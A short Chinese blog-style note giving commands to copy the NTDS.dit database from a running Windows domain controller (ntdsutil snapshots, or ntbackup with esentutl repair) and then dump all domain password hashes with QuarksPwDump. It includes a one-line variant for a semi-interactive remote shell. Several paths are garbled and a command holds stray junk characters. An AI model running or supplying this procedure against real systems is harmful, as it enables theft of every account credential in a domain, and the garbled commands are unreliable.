quarkspwdump作者介绍的用法:
| 1. Windows 2008 | |
| Microsoft recently implements VSS (Volume Shadow Copy Service) which allow an administrator to make | |
| filesystem snapshots while the operating is running and writing to current backuped files. | |
| Here is a way to backup NTDS.dit file while a domain controller is running: | |
| #ntdsutil | |
| #snapshot | |
| #activate instance ntds | |
| #create | |
| #mount {GUID} | |
| #copy c:MOUNT_POINTWINDOWSNTDSNTDS.dit c:NTDS_saved.dit | |
| #unmount {GUID} | |
| #quit | |
| #quit | |
| If AD server hasn't the "AD DS role", you have to use dsdbutil.exe command in the same way. | |
| 2. Windows 2003 | |
| On this version, VSS has been implemented but not NTDS-type snapshots. | |
| But you can use ntbackup tool, here is the procedure: | |
| - Launch NTBACKUP gui | |
| - Use backup wizard (advanced) | |
| - Choose to save system state only and choose output filename | |
| - Wait some minutes | |
| - Use restore wizard (advanced) | |
| - Choise your backup, click next and use advanced button | |
| - Choose to restore file on another location (c: mp for example) | |
| - Choose to overwrite everything and next uncheck all restoration parameters | |
| - Validate and wait some minutes | |
| - Open a command shell to "c: mpActive Directory" | |
| - We need to repair the database with this command | |
| #esentutl /p ntds.dit | |
| - Validate warning and wait some minutes | |
| ntds.dit file can now be used with quarkspwdump. |
其中
#ntdsutil
#snapshot
#activate instance ntds
#create
#mount {GUID}
#copy c:MOUNT_POINTWINDOWSNTDSNTDS.dit c:NTDS_saved.dit
#unmount {GUID}
#quit
#quit
适用于可交互式或直接登录状态。
如果是半交互式的,可以采用如下方法(网上看到的用法):
ntdsutil snapshot "activate instance ntds" create quit quit ntdsutil snapshot "mount {GUID}" quit quit copy MOUNT_POINTwindowsNTDS tds.dit c: tds.dit ntdsutil snapshot "unmount {GUID}" quit quit2 v- p5 I2 O E ntdsutil snapshot "delete {GUID}" quit quit
最后
QuarksPwDump.exe --dump-hash-domain --ntds-file c: tds.dit